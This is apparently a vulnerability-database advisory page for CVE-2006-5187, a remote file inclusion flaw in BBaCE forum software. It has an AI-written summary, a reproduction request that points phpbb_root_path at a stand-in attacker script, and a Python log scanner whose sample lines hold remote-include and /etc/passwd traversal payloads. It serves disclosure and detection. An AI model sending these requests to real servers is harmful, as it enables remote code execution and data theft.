VYPR
Unrated severity · NVD Advisory · Published Oct 10, 2006 · Updated Apr 23, 2026

CVE-2006-5187

Description

PHP remote file inclusion in BBaCE 3.5 and earlier allows arbitrary code execution via the phpbb_root_path parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Bulletin Board Ace (BBaCE) version 3.5 and earlier contains a PHP remote file inclusion vulnerability in the file includes/functions.php. The script unsafely incorporates a user-supplied value from the phpbb_root_path parameter into a require() or include() statement, allowing an attacker to specify an arbitrary URL. This issue is documented in advisory [1] and exploit code [2].

Exploitation

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable includes/functions.php script with the phpbb_root_path parameter set to the URL of a malicious PHP script hosted on an attacker-controlled server. No authentication is required; the attacker only needs network access to the target server. The exploit code [2] demonstrates the simple request format: http://target/[path]/includes/functions.php?phpbb_root_path=http://evil_script.

Impact

Successful exploitation allows the attacker to execute arbitrary PHP code on the target server with the privileges of the web server process. This can lead to full compromise of the application and potentially the underlying server, including data theft, defacement, or further lateral movement.

Mitigation

No official patch or fixed version has been released for BBaCE 3.5 or earlier. The application appears to be abandoned; users should consider migrating to an alternative forum software. As a temporary workaround, disable the vulnerable script or apply input validation to the phpbb_root_path parameter, though this is not a complete solution.

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products (3)

  • cpe:2.3:a:bulletin_board_ace:bulletin_board_ace:*:*:*:*:*:*:*:* (range: <=3.5)
  • cpe:2.3:a:bulletin_board_ace:bulletin_board_ace:3.4:*:*:*:*:*:*:*
  • (no CPE) range: <=3.5

Patches (0)

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input validation in includes/functions.php allows a remote URL supplied via the phpbb_root_path parameter to be used in a PHP file-inclusion call."

Attack vector

An attacker sends an HTTP GET request to `includes/functions.php` with the `phpbb_root_path` parameter set to a URL pointing to an attacker-controlled PHP script. The vulnerable code passes this user-supplied URL directly into a PHP file-inclusion construct, causing the remote script to be fetched and executed on the server. No authentication is required, and the attack works over standard HTTP.

Affected code

The vulnerable file is `includes/functions.php` in BBaCE 3.5 and earlier. The `phpbb_root_path` parameter is taken directly from the request and used to include a remote file without any sanitization.

What the fix does

No patch is included in the bundle. The advisory does not describe a fix; the only remediation is to avoid using the vulnerable version or to manually sanitize the `phpbb_root_path` parameter before it is used in a file-inclusion operation.

Preconditions

  • config: The target must run BBaCE 3.5 or earlier with the vulnerable includes/functions.php accessible.
  • network: No authentication is required; the attacker only needs network access to the web server.
  • input: The attacker supplies a URL in the phpbb_root_path parameter pointing to a malicious PHP script.

Reproduction

Send a request to the vulnerable server: `http://site.com/[path]/includes/functions.php?phpbb_root_path=http://[Evil_script]` where `[Evil_script]` is a URL hosting attacker-controlled PHP code. The remote code will be executed on the server.
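Added detection example, not part of this advisory or of BBaCE: it scans Apache combined-format access logs for requests to includes/functions.php whose phpbb_root_path value carries a URL scheme or stream wrapper, a NUL byte, or directory traversal, which is what the request pattern above looks like from the server side. The log lines, addresses and the /forum/ prefix are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format (addresses from documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2006:12:00:01 +0000] "GET /forum/includes/functions.php?phpbb_root_path=http://198.51.100.9/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Oct/2006:12:00:02 +0000] "GET /forum/index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2006:12:00:03 +0000] "GET /forum/includes/functions.php?phpbb_root_path=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 40 "-" "curl/7.15"
203.0.113.10 - - [10/Oct/2006:12:00:04 +0000] "GET /forum/includes/functions.php?phpbb_root_path=./ HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""

# Request line: client IP, timestamp, method, target (no spaces), protocol, status code.
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A path parameter must never carry a scheme: http://, ftp://, php://, data:// all turn the
# include() sink into remote or stream-wrapper inclusion when PHP allows URL includes.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def classify_root_path(value: str):
    """Return a finding label for a decoded phpbb_root_path value, or None when benign."""
    v = unquote(value)  # decode once more so double-encoded payloads are not missed
    if SCHEME_RE.match(v.lstrip()):
        return "remote-or-wrapper-include"
    if "\x00" in v:
        return "null-byte-truncation"  # NUL cuts off a suffix the script appends to the path
    if TRAVERSAL_RE.search(v):
        return "path-traversal"  # local file inclusion through the same sink
    return None

def scan_log(text: str):
    """One finding per hostile phpbb_root_path value on requests to includes/functions.php."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/includes/functions.php"):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("phpbb_root_path", []):
            label = classify_root_path(value)
            if label:
                findings.append({"ip": m.group("ip"), "time": m.group("ts"), "finding": label, "value": value})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The benign `./` value on the last line is what a legitimate script sets itself, so it produces no finding; only the two hostile requests are reported.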

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (5)

News mentions (0)

No linked articles in our index yet.